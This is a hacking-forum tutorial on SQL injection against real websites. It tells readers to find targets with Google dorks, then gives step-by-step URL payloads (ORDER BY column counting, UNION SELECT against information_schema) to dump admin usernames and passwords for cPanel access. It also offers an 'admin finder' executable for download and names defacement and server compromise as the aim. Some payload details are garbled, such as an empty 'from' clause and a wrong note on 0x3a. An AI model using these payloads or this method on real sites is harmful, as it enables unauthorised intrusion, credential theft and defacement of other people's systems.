SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)
What will I need to perform an SQL Injection attack?
[+] A good list of "google dorks"
[+] half a brain and the will to learn lol
For good search results search for a dork like this.
Code: Select all
index.php?id=
You must first check each site individually. To test a individual site add a " ' " after the url. For example.
Code: Select all
sqlivulnerablesite.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code: Select all
sqlivulnerablesite.com/index.php?id=1 order by 1--
Knowing that there is already 1 column in this database we do another code injection. Like this.
Code: Select all
sqlivulnerablesite.com/index.php?id=1 order by 2--
Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10.
*NOTE*
If you load the web page on a code injection like this.
Code: Select all
sqlivulnerablesite.com/index.php?id=1 order by 10--
Code: Select all
Unknown column '10' in 'order clause'
Code: Select all
sqlivulnerablesite.com/index.php?id=1 order by 9--
The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code: Select all
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--
Code: Select all
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9
Code: Select all
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--
Code: Select all
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--
Here (x) is the ascii value of the table name.
Now we must find the ascii value of the word admins.
GO HERE TO CONVERT TEXT TO ASCII
The ascii value of admins is
Code: Select all
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;
Code: Select all
97,100,109,105,110,115
Code: Select all
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--
Code: Select all
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --
(0x3a) is the ascii value of the column name
When the page loads it should show the data of the username and password for cpanel access.
Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise.
Hopefully someone might find this thread usefull.
Download Link http://link.removed.tld/download.php?g7omyl80fz7gfs5
Think will include website hacking tool + Fresh Dork